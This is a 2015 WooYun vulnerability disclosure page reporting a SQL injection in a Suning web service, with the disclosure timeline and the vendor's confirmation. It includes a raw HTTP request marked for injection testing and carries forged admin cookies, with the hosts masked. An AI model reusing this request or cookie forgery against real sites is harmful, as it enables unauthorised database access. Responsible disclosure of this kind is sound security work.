当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144374

漏洞标题:苏宁某业务SQL注入

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: Mark0smith

提交时间:2015-10-01 11:37

修复时间:2015-11-24 17:04

公开时间:2015-11-24 17:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-01: 细节已通知厂商并且等待厂商处理中
2015-10-10: 厂商已经确认,细节仅向厂商公开
2015-10-20: 细节向核心白帽子及相关领域专家公开
2015-10-30: 细节向普通白帽子公开
2015-11-09: 细节向实习白帽子公开
2015-11-24: 细节向公众公开

简要描述:

未修复

详细说明:

http://**.**.**.**/bugs/wooyun-2015-0131632


这里面的 **.**.**.**/ 已无法访问,但是我找到了这个地址

http://**.**.**.**/


将注入语句中的地址也一并修改,得到

root@kali:~# cat sql_test 
GET /index.php?c=actstats&model=*&version=*&isp=*&mac=0&province=0&city=0&acttype=&symd=2015-01-01&eymd=2015-08-03 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: **.**.**.**/index.php?c=actstats&model=Pioneer+M1&version=&isp=-1&mac=0&province=0&city=0&acttype=&symd=2015-01-01&eymd=2015-08-01
Cookie: bug_uid=1; bug_username=admin; bug_logintime=1438675614; bug_salt=admin
Connection: keep-alive


2015-10-01 11-16-47 的屏幕截图.png


非dba权限

2015-10-01 11-17-52 的屏幕截图.png


做到@抽烟的2B青年 前辈那一步

2015-10-01 11-18-52 的屏幕截图.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 Mark0smith@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-10 17:03

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置(需新建立联系渠道).

最新状态:

暂无


漏洞评价:

评论